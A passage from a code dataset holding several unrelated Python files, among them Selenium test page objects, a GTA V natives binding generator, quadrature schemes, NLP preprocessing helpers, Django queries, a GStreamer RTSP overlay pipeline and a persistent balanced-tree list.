self.start_input.send_keys(keys)\n\n @property\n def end(self):\n return datetime.datetime.strptime(self.end_input.get_attribute('value'), '%Y-%m-%d').date()\n\n @end.setter\n def end(self, date):\n keys = '{:02d}{:02d}{}'.format(date.day, date.month, date.year) \n self.end_input.send_keys(keys)\n\n def submit(self):\n self.submit_button.click()\n\nclass RepeatOptions:\n\n def __init__(self, driver):\n\n self.driver = driver\n self.element = driver.find_element_by_id('repeat-options-div')\n self.close_button = driver.find_element_by_id('repeat-options-close-button')\n self.submit_button = driver.find_element_by_id('repeat-options-submit-button')\n self.ends_after_n_transactions = self.element.find_element_by_id('ends-after-n-transactions')\n self.n_transactions_input =self.element.find_element_by_id('n-transactions-input')\n self.ends_on_date = self.element.find_element_by_id('ends-on-date')\n self.end_date_input = self.element.find_element_by_id('ends-on-date-input')\n self.never_ends = self.element.find_element_by_id('never-ends')\n self.frequency_input = Select(self.element.find_element_by_id('frequency-input'))\n self.steps_input = self.element.find_element_by_id('steps-input')\n\n def submit(self):\n WebDriverWait(self.driver, 10).until(\n EC.visibility_of_element_located((By.ID, \"repeat-options-submit-button\"))\n )\n self.submit_button.click()\n WebDriverWait(self.driver, 10).until(\n EC.invisibility_of_element_located((By.ID, \"repeat-options-submit -button\"))\n )\n\n def select(self, option):\n WebDriverWait(self.driver, 10).until(\n EC.visibility_of_element_located((By.ID, 'ends-after-n-transactions'))\n )\n if option == 'ends_after_#_transactions':\n self.ends_after_n_transactions.click()\n elif option == 'ends_on_date':\n self.ends_on_date.click()\n elif option == 'never':\n self.never_ends.click()\n\n def set_n_transactions(self, transactions):\n WebDriverWait(self.driver, 10).until(\n EC.visibility_of_element_located((By.ID, self.n_transactions_input.get_attribute('id')))\n )\n self.n_transactions_input.clear()\n self.n_transactions_input.send_keys(transactions)\n \n def set_end_date(self, date):\n keys = '{:02d}{:02d}{}'.format(date.day, date.month, date.year) \n self.end_date_input.send_keys(keys)\n\n def set_frequency(self, frequency, steps=None):\n self.frequency_input.select_by_value(frequency)\n WebDriverWait(self.driver, 60).until(\n EC.visibility_of_element_located((By.ID, self.steps_input.get_attribute('id')))\n )\n if steps is not None:\n self.steps_input.clear()\n self.steps_input.send_keys(steps)\n\n def set_end_criteria(self, ends):\n self.select(ends['how'])\n if ends['how'] == 'never_ends':\n pass\n elif ends['how'] == 'ends_after_#_transactions':\n self.set_n_transactions(ends['when'])\n elif ends['how'] == 'ends_on_date':\n self.set_end_date(ends['when'])\n else:\n raise Exception('unrecognised end criteria: {}'.format(ends))\n\nclass RepeatTransactionsList:\n\n def __init__(self, driver):\n\n self.driver = driver\n self.element = driver.find_element_by_id('repeat-transactions')\n self.table = self.element.find_element_by_tag_name('table')\n\n def assert_in(self, date, size, description, repeats, ends):\n x = (date, size, description, repeats, ends)\n assert len(list(filter(lambda y: y == x, self.items))) > 0\n\n @property\n def items(self):\n rows = self.table.find_elements_by_css_selector('.repeat-transaction')\n items = []\n for row in rows:\n tds = row.find_elements_by_tag_name('td')\n date_input = tds[0].find_element_by_tag_name('input')\n date = strptime(date_input.get_attribute('value'), '%Y-%m-%d').date()\n size_input = tds[1].find_element_by_tag_name('input')\n size = float(size_input.get_attribute('value').replace('£', ''))\n description_input = tds[2].find_element_by_tag_name('input')\n description = description_input.get_attribute('value')\n repeats_input = tds[3].find_element_by_tag_name('input')\n repeats = repeats_input.get_attribute('value')\n ends_input = tds[4].find_element_by_tag_name('input')\n ends = ends_input.get_attribute('value')\n repeat_transaction = {\n 'date': date,\n 'size': size,\n 'description': description,\n 'repeats': repeats,\n 'ends': ends\n }\n\n items.append(repeat_transaction)\n return items\n","repo_name":"dvoong/voong_finance_3","sub_path":"functional_tests/homepage/HomePage.py","file_name":"HomePage.py","file_ext":"py","file_size_in_byte":15825,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"40434196294","text":"import json\n\nnatives = json.load(open(\"natives.json\"))\nout_file : str = \"\"\n\ndef sanitize_param(name):\n if name in [\"repeat\", \"end\"]:\n return \"_\"+name\n else:\n return name\n\ndef make_param_listing(params):\n pms = \"\"\n for param in params:\n pms += sanitize_param(param[\"name\"])\n pms += \",\"\n pms = pms.rstrip(\",\")\n return pms\n\ndef is_string(type: str):\n return type.find(\"char*\") != -1\n\ndef is_pointer(type: str):\n \"\"\"also returns true for string\"\"\"\n return type.find('*') != -1\n\n\ndef write_native(name, hash, params, return_type):\n global out_file\n\n out_file += f\"{name}=function({make_param_listing(params)})\"\n\n invoke_type = \"invoke_int\"\n\n if (return_type == \"void\"):\n invoke_type = \"invoke_void\"\n elif (return_type == \"float\"):\n invoke_type = \"invoke_float\"\n elif (return_type == \"BOOL\"):\n invoke_type = \"invoke_bool\"\n elif (return_type == \"const char*\"):\n invoke_type = \"invoke_str\"\n elif (return_type == \"Vector3\"):\n invoke_type = \"invoke_vec3\"\n elif (return_type.endswith(\"*\")):\n invoke_type = \"invoke_ptr\"\n\n out_file += f\"return _natives.{invoke_type}({hash},\"\n for param in params:\n out_file += f\"{sanitize_param(param['name'])},\"\n out_file = out_file.removesuffix(\",\")\n out_file += \");end,\\n\"\n\ndef write_namespace(name, data):\n global out_file\n\n out_file += f\"{name} = {{\\n\"\n\n for (hash, more) in data.items():\n write_native(more[\"name\"], hash, more[\"params\"], more[\"return_type\"])\n \n out_file += \"};\\n\"\n\ndef write_file():\n for (namespace, data) in natives.items():\n write_namespace(namespace, data)\n\ndef convert_and_write_cpp_file():\n global out_file\n\n cpp_data = \"#pragma once\\n// clang-format off\\n// Generated by natives_gen.py. DO NOT EDIT\\nchar natives_data[] = \\n\"\n\n lines = out_file.rstrip('\\n').splitlines()\n for line in lines:\n cpp_data += f\"\\\"{line}\\\\n\\\"\\\\\\n\"\n \n cpp_data = cpp_data.rstrip('\\n\\\\')\n cpp_data += \";\\n// clang-format on\\n\"\n cpp_data += \"int natives_size = sizeof(natives_data)-1;\"\n open(\"natives_data.cpp\", \"w+\").write(cpp_data)\n\ndef write_lua_file():\n open(\"natives.lua\", \"w+\").write(out_file)\n\nif __name__ == \"__main__\":\n write_file()\n convert_and_write_cpp_file()","repo_name":"JosephAJJames/DLL-GTAV","sub_path":"src/lua/natives/natives_gen.py","file_name":"natives_gen.py","file_ext":"py","file_size_in_byte":2313,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"30920839198","text":"from sympy import Rational as frac\nfrom sympy import sqrt\n\nfrom ..helpers import article\nfrom ._helpers import QuadrilateralScheme, concat, symm_r0, symm_s, zero\n\ncitation = article(\n authors=[\"G.W. Tyler\"],\n title=\"Numerical integration of functions of several variables\",\n journal=\"Canad. J. Math.\",\n volume=\"5\",\n year=\"1953\",\n pages=\"393-412\",\n url=\"https://doi.org/10.4153/CJM-1953-044-1\",\n)\n\n\ndef tyler_1():\n weights, points = concat(\n zero(-frac(28, 45)),\n symm_s([frac(1, 36), 1]),\n symm_r0([frac(1, 45), 1], [frac(16, 45), frac(1, 2)]),\n )\n weights *= 4\n return QuadrilateralScheme(\"Tyler 1\", weights, points, 5, citation)\n\n\ndef tyler_2():\n r = sqrt(frac(6, 7))\n s, t = [sqrt((114 - i * 3 * sqrt(583)) / 287) for i in [+1, -1]]\n B1 = frac(49, 810)\n B2, B3 = [(178981 + i * 2769 * sqrt(583)) / 1888920 for i in [+1, -1]]\n weights, points = concat(symm_r0([B1, r]), symm_s([B2, s], [B3, t]))\n weights *= 4\n return QuadrilateralScheme(\"Tyler 2\", weights, points, 7, citation)\n\n\ndef tyler_3():\n weights, points = concat(\n zero(frac(449, 315)),\n symm_r0(\n [frac(37, 1260), 1], [frac(3, 28), frac(2, 3)], [-frac(69, 140), frac(1, 3)]\n ),\n symm_s([frac(7, 540), 1], [frac(32, 135), frac(1, 2)]),\n )\n weights *= 4\n return QuadrilateralScheme(\"Tyler 3\", weights, points, 7, citation)\n","repo_name":"LJPapenfort/quadpy","sub_path":"quadpy/quadrilateral/_tyler.py","file_name":"_tyler.py","file_ext":"py","file_size_in_byte":1409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"36927988421","text":"\nimport stanza\n\nimport re\n\nfrom nltk import pos_tag\nfrom nltk.tokenize import sent_tokenize\nfrom nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords \n\nfrom collections import Counter\n\n\ndef normalize(s):\n replacements = (\n (\"á\", \"a\"),\n (\"é\", \"e\"),\n (\"í\", \"i\"),\n (\"ó\", \"o\"),\n (\"ú\", \"u\"),\n (\"ä\", \"a\"),\n (\"ë\", \"e\"),\n (\"ï\", \"i\"),\n (\"ö\", \"o\"),\n (\"ü\", \"u\"),\n )\n for a, b in replacements:\n s = s.replace(a, b).replace(a.upper(), b.upper())\n return s\n\n\n\n\ndef lematizar(raw_text, nlp):\n palabras = nlp(raw_text)\n tokens = []\n for sentence in palabras.sentences:\n for word in sentence.words:\n tokens.append(word.lemma)\n return tokens\n\n\n#Funcion para remover stop words de una lista de tokens\ndef rem_stop_words(tokens, language):\n stop_words = set(stopwords.words(language))\n \n \n\n filtered_sentence = [w for w in tokens if not w in stop_words] \n return filtered_sentence\n\n\n\ndef tokenize(raw_text, nlp, language, lemmatize, rem_stop):\n \"\"\" Tokenizes and lemmatizes a raw text \"\"\"\n #Tokenizador: hace algunas modificaciones (replace) que hace un mini preprocesamiento para q funciona bien\n \n raw_text = raw_text.replace(\"\\'\", \"'\")\n raw_text = raw_text.replace(\"/\", \" / \")\n raw_text = raw_text.replace(\"

\", \"\\n\")\n raw_text = normalize(raw_text) #Quito tildes\n \n #Lematizo, devuelve el texto tokenizado si es True \n \n if lemmatize:\n tokens = lematizar(raw_text, nlp)\n \n #SI se apaga el lematizador, tokenizo manualmente\n else:\n sentences = sent_tokenize(raw_text) #Tokenizador\n tokens = [e2 for e1 in sentences for e2 in word_tokenize(e1)] # Nested list comprehension. Para cada palabra, mete el tokenizador\n \n tokens = [e for e in tokens if re.compile(\"[A-Za-z]\").search(e[0])] #Se queda con todas las palabras q tienen caracteres alfanumericos (vuela comas)\n \n tokens = [e.lower() for e in tokens]\n\n if rem_stop:\n #Quita stopwords\n tokens = rem_stop_words(tokens, language)\n \n \n return(tokens)\n\n\ndef procesar_articulos(articulos, nlp, language='english', lemmatize = True, rem_stop = True ):\n articulos_procesados = list()\n for idx in range(len(articulos)):\n if idx%100==0:\n print(idx)\n art = articulos[idx]\n articulo_tokenizado = tokenize(art, nlp, language, lemmatize = lemmatize, rem_stop = rem_stop )\n articulos_procesados.append(\" \".join(articulo_tokenizado))\n return articulos_procesados\n\n","repo_name":"scis12/LDA-clustering","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2616,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1282295519","text":"from bundesliga_app.models import (\n Match,\n Wins_Losses_Season,\n Team\n)\nfrom django.db.models import Q\n\ndef create_wins_losses_season(team_id, league_shortcut, league_season):\n new_wins_losses_season = Wins_Losses_Season(\n team_id=team_id,\n wins=0,\n loses=0,\n season=league_season,\n league=league_shortcut\n )\n\n new_wins_losses_season.save()\n\n\ndef create_match(match, league_shortcut, league_season):\n if not match['MatchIsFinished']:\n points_one = None\n points_two = None\n else:\n points_one = match['MatchResults'][1]['PointsTeam1']\n points_two = match['MatchResults'][1]['PointsTeam2']\n\n new_match = Match(\n match_id=match['MatchID'],\n date=match['MatchDateTimeUTC'],\n team_one_id=match['Team1']['TeamId'],\n team_two_id=match['Team2']['TeamId'],\n points_one=points_one,\n points_two=points_two,\n season=league_season,\n league=league_shortcut,\n gameday = int(match['Group']['GroupName'].split('.')[0]),\n is_finished=match['MatchIsFinished']\n )\n new_match.save()\n\n\ndef get_unfinished_matches(league_shortcut, league_season):\n unfinished_matches = Match.objects.filter(league=league_shortcut, is_finished=False)\n\n return unfinished_matches\n\n\ndef get_all_matches(league_shortcut, league_season):\n matches = Match.objects.filter(league=league_shortcut, season=league_season).order_by('date')\n\n return matches\n\n\ndef get_matches_after_gameday(league_shortcut, league_season, current_gameday):\n matches = Match.objects.filter(league=league_shortcut, season=league_season, gameday__gt=current_gameday)\n\n return matches\n\n\ndef get_wins_losses(league_shortcut, league_season):\n win_loss_ratios = Wins_Losses_Season.objects.filter(league=league_shortcut, season=league_season)\n\n return win_loss_ratios\n\n\ndef get_teams_with_name(team_name):\n teams = Team.objects.filter(name__icontains=team_name)\n\n return teams\n\n\ndef get_wins_losses_for_team(team_id):\n wins_losses_for_team = Wins_Losses_Season.objects.get(team_id=team_id)\n\n return wins_losses_for_team\n\n\ndef get_past_matches_for_team(team_id):\n matches = Match.objects.filter(Q(team_one_id=team_id) | Q(team_two_id=team_id), is_finished=True)\\\n .select_related()\\\n .order_by('date')\n\n return matches\n\n\ndef get_next_matches_for_team(team_id):\n matches = Match.objects.filter(Q(team_one_id=team_id) | Q(team_two_id=team_id), is_finished=False)\\\n .select_related()\\\n .order_by('date')\n\n return matches\n","repo_name":"SVladkov/Bundesliga","sub_path":"bundesliga_app/data/local_database.py","file_name":"local_database.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"28241964974","text":"import os\r\nimport config\r\n\r\nimport cairo\r\n\r\n\r\nfrom gi.repository import Gst, GLib\r\nimport sys\r\nimport gi\r\n\r\ngi.require_version('Gst', '1.0')\r\n\r\n# gst pipeline\r\n# gst-launch-1.0 rtspsrc location='rtsp://makepluscode:000000@192.168.219.155/stream1' ! rtph264depay ! h264parse ! decodebin ! videoconvert ! autovideosink\r\n\r\nOVERLAY_FRAME_WIDTH = 1920\r\nOVERLAY_FRAME_HEIGHT = 1080\r\n\r\n\r\ndef graph_pipeline(pipeline):\r\n Gst.debug_bin_to_dot_file(pipeline, Gst.DebugGraphDetails.ALL,\r\n \"pipeline\")\r\n try:\r\n os.system(\"dot -Tpng -o ./pipeline.png ./pipeline.dot\")\r\n except Exception as e:\r\n print(e)\r\n\r\n\r\ndef on_message(bus: Gst.Bus, message: Gst.Message, loop: GLib.MainLoop):\r\n msg = message.type\r\n\r\n if msg == Gst.MessageType.EOS:\r\n print(\"on_message : End Of Stream\")\r\n loop.quit()\r\n\r\n elif msg == Gst.MessageType.WARNING:\r\n err, debug = message.parse_warning()\r\n print(\"on_message : Warnning -\", err, debug)\r\n\r\n elif msg == Gst.MessageType.ERROR:\r\n err, debug = message.parse_error()\r\n print(\"on_message : Error -\", err, debug)\r\n loop.quit()\r\n\r\n elif msg == Gst.MessageType.INFO:\r\n err, debug = message.parse_info()\r\n print(\"on_message : Info -\", err, debug)\r\n\r\n return True\r\n\r\n\r\ndef on_draw(_overlay, context, _timestamp, _duration):\r\n # print(\"*_overlay = \", _overlay, \"context = \",\r\n # context, \"*_timestamp = \", _timestamp)\r\n\r\n # creating shape\r\n context.rectangle(900, 500, 120, 80)\r\n\r\n # setting color of the context\r\n context.set_source_rgba(1.0, 0.0, 0.0, 0.5)\r\n\r\n # fill the color inside\r\n context.fill()\r\n\r\n # creating shape\r\n context.rectangle(1020, 500, 120, 80)\r\n\r\n # setting color of the context\r\n context.set_source_rgba(0.0, 1.0, 0.0, 1.0)\r\n\r\n # Setting outline width\r\n context.set_line_width(4)\r\n\r\n # stroke out the color and width property\r\n context.stroke()\r\n\r\n text = 'Hello, makepluscode'\r\n (x, y, w, h, dx, dy) = context.text_extents(text)\r\n context.select_font_face(\r\n 'Open Sans', cairo.FONT_SLANT_NORMAL, cairo.FONT_WEIGHT_NORMAL)\r\n context.set_font_size(40)\r\n context.set_source_rgba(0.0, 0.0, 0.0, 1.0)\r\n context.move_to((OVERLAY_FRAME_WIDTH - w) / 2.0,\r\n (OVERLAY_FRAME_HEIGHT - h) / 2.0)\r\n context.show_text(text)\r\n\r\n\r\ndef create_pipepline(pipeline: Gst.Pipeline):\r\n src = Gst.ElementFactory.make(\"rtspsrc\", \"src\")\r\n src.set_property(\r\n \"location\", \"rtsp://\" + config.USERNAME + \":\" + config.PASSWORD + \"@\" + config.IPADDRESS + \"/stream1\")\r\n src.set_property(\"latency\", 0)\r\n src.set_property(\"drop-on-latency\", True)\r\n # src.set_property(\"udp-buffer-size\", 2097152)\r\n\r\n queue = Gst.ElementFactory.make(\"queue\", \"queue\")\r\n queue.set_property(\"max-size-buffers\", 4)\r\n depay = Gst.ElementFactory.make(\"rtph264depay\", \"depay\")\r\n parse = Gst.ElementFactory.make(\"h264parse\", \"parse\")\r\n decode = Gst.ElementFactory.make(\"avdec_h264\", \"decode\")\r\n convert = Gst.ElementFactory.make(\"videoconvert\", \"convert\")\r\n overlay = Gst.ElementFactory.make(\"cairooverlay\", \"overlay\")\r\n overlay.connect('draw', on_draw)\r\n sink = Gst.ElementFactory.make(\"autovideosink\", \"sink\")\r\n\r\n if (not src or not depay or not parse or not decode or not convert or not sink):\r\n print(\"ERROR: Not all elements could be created.\")\r\n sys.exit(1)\r\n\r\n pipeline.add(src)\r\n pipeline.add(queue)\r\n pipeline.add(depay)\r\n pipeline.add(parse)\r\n pipeline.add(decode)\r\n pipeline.add(convert)\r\n pipeline.add(overlay)\r\n pipeline.add(sink)\r\n\r\n def on_rtspsrc_pad_added(rtspsrc, pad, depay):\r\n print(pad.name)\r\n src.link(queue)\r\n queue.link(depay)\r\n\r\n src.connect(\"pad-added\", on_rtspsrc_pad_added, depay)\r\n\r\n ret = depay.link(parse)\r\n ret = ret and parse.link(decode)\r\n ret = ret and decode.link(convert)\r\n ret = ret and convert.link(overlay)\r\n ret = ret and overlay.link(sink)\r\n\r\n if not ret:\r\n print(\"ERROR: Elements could not be linked\")\r\n sys.exit(1)\r\n else:\r\n print(\"DONE: Elements could be linked\")\r\n\r\n return True\r\n\r\n\r\ndef main():\r\n Gst.init(sys.argv)\r\n\r\n Gst.debug_set_active(True)\r\n Gst.debug_set_default_threshold(3)\r\n\r\n # create a pipeline with factory\r\n pipeline = Gst.Pipeline()\r\n\r\n create_pipepline(pipeline)\r\n\r\n pipeline.set_state(Gst.State.PLAYING)\r\n\r\n loop = GLib.MainLoop()\r\n\r\n # connect bus to catch signal from the pipeline\r\n bus = pipeline.get_bus()\r\n bus.add_signal_watch()\r\n bus.connect(\"message\", on_message, loop)\r\n\r\n graph_pipeline(pipeline)\r\n\r\n # run\r\n try:\r\n loop.run()\r\n except:\r\n pass\r\n\r\n # if fails, then clean\r\n pipeline.set_state(Gst.State.NULL)\r\n\r\n\r\nif __name__ == \"__main__\":\r\n main()\r\n","repo_name":"makepluscode/gstreamer-examples-python","sub_path":"13-rtspsrc-cairooveray/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4861,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"23077950579","text":"import pandas as pd\nimport numpy as np\nfrom .AnalysisUtilities import AnalysisUtilities as util\n\ndef custom_analysis(batch_df: pd.DataFrame, uniprot_id: str, PDB_path: str, PAE_path: str):\n \n dataColumns = {'uniprot': [], 'position': [], 'error': [], 'plDDT_5.0A': [], 'plDDT_1res': [], 'plDDT_31res': [], 'PAE_5.0A_allPairs': [], 'num_neighbours_5.0A': []}\n \n AFModel = util.load_alphafold(uniprot_id, PDB_path, PAE_path)\n \n if AFModel == False:\n util.append_error_message('PDB/PAE files not found', dataColumns)\n returnDataframe = pd.DataFrame(dataColumns)\n return (returnDataframe, uniprot_id)\n \n modelLength = AFModel.get_chain('A').length\n \n for position in range(1, modelLength+1):\n dataColumns['uniprot'].append(uniprot_id)\n dataColumns['position'].append(position)\n dataColumns['error'].append('OK')\n dataColumns['plDDT_5.0A'].append(AFModel.get_local_plddt(position,radius=5))\n dataColumns['plDDT_1res'].append(AFModel.get_plddt(position)[0])\n dataColumns['plDDT_31res'].append(np.around(AFModel.get_plddt_window(position, window=31)[0],3))\n dataColumns['PAE_5.0A_allPairs'].append(np.around(AFModel.get_local_PAE(position, radius=5, with_query_only=True), 3))\n dataColumns['num_neighbours_5.0A'].append(len(AFModel.get_residues_within(position, radius=5)))\n \n returnDataframe = pd.DataFrame(dataColumns)\n \n return (returnDataframe, uniprot_id)\n \n ","repo_name":"Levurmion/multiprocessing_pipeline","sub_path":"scripts/custom_analysis_functions/background_residue_metrics.py","file_name":"background_residue_metrics.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"15665521016","text":"from setuptools import setup, find_packages\nimport sys, os\n\nversion = '0.1.2'\n\nsetup(\n name = 'logsanitizer',\n version = version,\n description = \"Log processing and sanitizer tool written in Python.\",\n packages = find_packages( exclude = [ 'ez_setup'] ),\n include_package_data = True,\n zip_safe = False,\n author = 'Bence Faludi',\n author_email = 'befaludi@microsoft.com',\n license = 'MIT',\n install_requires = [\n 'pyyaml'\n ],\n entry_points={\n 'console_scripts': [\n 'logsanitizer = logsanitizer:main',\n ],\n },\n test_suite = \"logsanitizer.tests\",\n url = 'http://6wunderkinder.com'\n)\n","repo_name":"microsoftarchive/logsanitizer","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"27551966649","text":"class Animal:\n species = \"Animal\"\n\n def __init__(self, weight: int):\n self.weight = weight\n\n @staticmethod\n def speak():\n print(\"I'm an animal.\")\n\n\n# Dog会继承Animal的方法与属性\nclass Dog(Animal):\n\n @staticmethod\n def bark():\n print(\"Woof!\")\n\n # 重写父类方法\n # def speak(self):\n # print(\"I'm a dog !\")\n\n\nif __name__ == '__main__':\n my_dog = Dog(1)\n my_dog.speak()\n my_dog.bark()\n print(my_dog.weight)\n","repo_name":"lincvic/py-basic","sub_path":"h_oop_example/oop_inheritance_example.py","file_name":"oop_inheritance_example.py","file_ext":"py","file_size_in_byte":481,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"33295522774","text":"from math import sqrt\nfrom typing import Generic, Iterable, Optional, TypeVar, Callable, List, Tuple, Final\nT = TypeVar('T')\n\nclass PersistentWBTreeList(Generic[T]):\n\n ALPHA: Final[float] = 1 - sqrt(2) / 2\n BETA : Final[float] = (1 - 2*ALPHA) / (1 - ALPHA)\n\n class Node():\n\n def __init__(self, key: T):\n self.key: T = key\n self.left: Optional[PersistentWBTreeList.Node] = None\n self.right: Optional[PersistentWBTreeList.Node] = None\n self.size: int = 1\n\n def copy(self) -> 'PersistentWBTreeList.Node':\n node = PersistentWBTreeList.Node(self.key)\n node.left = self.left\n node.right = self.right\n node.size = self.size\n return node\n\n def balance(self) -> float:\n return ((self.left.size if self.left else 0)+1) / (self.size+1)\n\n def __str__(self):\n if self.left is None and self.right is None:\n return f'key={self.key}, size={self.size}\\n'\n return f'key={self.key}, size={self.size},\\n left:{self.left},\\n right:{self.right}\\n'\n\n __repr__ = __str__\n\n def __init__(self,\n a: Iterable[T],\n _root: Optional[Node]=None\n ) -> None:\n self.root: Optional[PersistentWBTreeList.Node] = _root\n a = list(a)\n if a:\n self._build(list(a))\n\n def _build(self, a: List[T]) -> None:\n Node = PersistentWBTreeList.Node\n def build(l: int, r: int) -> Node:\n mid = (l + r) >> 1\n node = Node(a[mid])\n if l != mid:\n node.left = build(l, mid)\n if mid+1 != r:\n node.right = build(mid+1, r)\n self._update(node)\n return node\n self.root = build(0, len(a))\n\n def _update(self, node: Node) -> None:\n if node.left is None:\n if node.right is None:\n node.size = 1\n else:\n node.size = 1 + node.right.size\n else:\n if node.right is None:\n node.size = 1 + node.left.size\n else:\n node.size = 1 + node.left.size + node.right.size\n\n def _rotate_right(self, node: Node) -> Node:\n assert node.left\n u = node.left.copy()\n node.left = u.right\n u.right = node\n self._update(node)\n self._update(u)\n return u\n\n def _rotate_left(self, node: Node) -> Node:\n assert node.right\n u = node.right.copy()\n node.right = u.left\n u.left = node\n self._update(node)\n self._update(u)\n return u\n\n def _balance_left(self, node: Node) -> Node:\n assert node.right\n node.right = node.right.copy()\n u = node.right\n if u.balance() >= self.BETA:\n assert u.left\n node.right = self._rotate_right(u)\n u = self._rotate_left(node)\n return u\n\n def _balance_right(self, node: Node) -> Node:\n assert node.left\n node.left = node.left.copy()\n u = node.left\n if u.balance() <= 1 - self.BETA:\n assert u.right\n node.left = self._rotate_left(u)\n u = self._rotate_right(node)\n return u\n\n def _merge_with_root(self, l: Optional[Node], root: Node, r: Optional[Node]) -> Node:\n ls = l.size if l else 0\n rs = r.size if r else 0\n diff = (ls+1) / (ls+rs+1+1)\n if diff > 1-self.ALPHA:\n assert l\n l = l.copy()\n l.right = self._merge_with_root(l.right, root, r)\n self._update(l)\n if not (self.ALPHA <= l.balance() <= 1-self.ALPHA):\n return self._balance_left(l)\n return l\n if diff < self.ALPHA:\n assert r\n r = r.copy()\n r.left = self._merge_with_root(l, root, r.left)\n self._update(r)\n if not (self.ALPHA <= r.balance() <= 1-self.ALPHA):\n r = self._balance_right(r)\n return r\n return r\n root = root.copy()\n root.left = l\n root.right = r\n self._update(root)\n return root\n\n def _merge_node(self, l: Optional[Node], r: Optional[Node]) -> Optional[Node]:\n if l is None and r is None:\n return None\n if l is None:\n assert r\n return r.copy()\n if r is None:\n return l.copy()\n l = l.copy()\n r = r.copy()\n l, root = self._pop_right(l)\n return self._merge_with_root(l, root, r)\n\n def merge(self, other: 'PersistentWBTreeList') -> 'PersistentWBTreeList':\n root = self._merge_node(self.root, other.root)\n return self._new(root)\n\n def _pop_right(self, node: Node) -> Tuple[Node, Node]:\n path = []\n node = node.copy()\n mx = node\n while node.right is not None:\n path.append(node)\n node = node.right.copy()\n mx = node\n path.append(node.left.copy() if node.left else None)\n for _ in range(len(path)-1):\n node = path.pop()\n if node is None:\n path[-1].right = None\n self._update(path[-1])\n continue\n b = node.balance()\n if self.ALPHA <= b <= 1-self.ALPHA:\n path[-1].right = node\n elif b > 1-self.ALPHA:\n path[-1].right = self._balance_right(node)\n else:\n path[-1].right = self._balance_left(node)\n self._update(path[-1])\n if path[0] is not None:\n b = path[0].balance()\n if b > 1-self.ALPHA:\n path[0] = self._balance_right(path[0])\n elif b < self.ALPHA:\n path[0] = self._balance_left(path[0])\n mx.left = None\n self._update(mx)\n return path[0], mx\n\n def _split_node(self, node: Optional[Node], k: int) -> Tuple[Optional[Node], Optional[Node]]:\n if node is None:\n return None, None\n tmp = k if node.left is None else k-node.left.size\n l, r = None, None\n if tmp == 0:\n return node.left, self._merge_with_root(None, node, node.right)\n elif tmp < 0:\n l, r = self._split_node(node.left, k)\n return l, self._merge_with_root(r, node, node.right)\n else:\n l, r = self._split_node(node.right, tmp-1)\n return self._merge_with_root(node.left, node, l), r\n\n def split(self, k: int) -> Tuple['PersistentWBTreeList', 'PersistentWBTreeList']:\n l, r = self._split_node(self.root, k)\n return self._new(l), self._new(r)\n\n def _new(self, root: Optional['PersistentWBTreeList.Node']) -> 'PersistentWBTreeList':\n return PersistentWBTreeList([], root)\n\n def insert(self, k: int, key: T) -> 'PersistentWBTreeList':\n s, t = self._split_node(self.root, k)\n root = self._merge_with_root(s, PersistentWBTreeList.Node(key), t)\n return self._new(root)\n\n def pop(self, k: int) -> Tuple['PersistentWBTreeList', T]:\n s, t = self._split_node(self.root, k+1)\n assert s\n s, tmp = self._pop_right(s)\n root = self._merge_node(s, t)\n return self._new(root), tmp.key\n\n def set(self, k: int, v: T) -> 'PersistentWBTreeList':\n if k < 0:\n k += len(self)\n node = self.root.copy()\n root = node\n pnode = None\n d = 0\n while True:\n assert node\n t = 0 if node.left is None else node.left.size\n if t == k:\n node = node.copy()\n node.key = v\n if d:\n pnode.left = node\n else:\n pnode.right = node\n return self._new(root)\n pnode = node\n if t < k:\n k -= t + 1\n node = node.right.copy()\n d = 0\n else:\n d = 1\n node = node.left.copy()\n if d:\n pnode.left = node\n else:\n pnode.right = node\n\n def copy(self) -> 'PersistentWBTreeList':\n root = self.root.copy() if self.root else None\n return self._new(root)\n\n def tolist(self) -> List[T]:\n node = self.root\n stack = []\n a = []\n while stack or node:\n if node:\n stack.append(node)\n node = node.left\n else:\n node = stack.pop()\n a.append(node.key)\n node = node.right\n return a\n\n def __getitem__(self, k: int) -> T:\n if k < 0:\n k += len(self)\n node = self.root\n while True:\n assert node\n t = 0 if node.left is None else node.left.size\n if t == k:\n return node.key\n elif t < k:\n k -= t + 1\n node = node.right\n else:\n node = node.left\n\n def __len__(self):\n return 0 if self.root is None else self.root.size\n\n def __str__(self):\n return '[' + ', '.join(map(str, self.tolist())) + ']'\n\n def __repr__(self):\n return f'PersistentWBTreeList({self})'\n\n","repo_name":"titanium-22/Library_py","sub_path":"DataStructures/WBTree/PersistentWBTreeList.py","file_name":"PersistentWBTreeList.py","file_ext":"py","file_size_in_byte":7973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"19207524648","text":"class Solution:\n def canReach(self, arr: List[int], start: int) -> bool:\n def visit(index: int) -> bool:\n if 0 <= index < size and index not in visited:\n value = arr[index]\n if value == 0:\n return True\n else:\n visited.add(index)\n if visit(index + arr[index]):\n return True\n if visit(index - arr[index]):\n return True\n return False\n size = len(arr)\n visited = set()\n return visit(start)\n \n","repo_name":"michaelhuo/pcp","sub_path":"1306.py","file_name":"1306.py","file_ext":"py","file_size_in_byte":611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73806850170","text":"import time\nimport signal\nimport os\nfrom tkinter import *\nfrom evdev import InputDevice\n\n\nclass 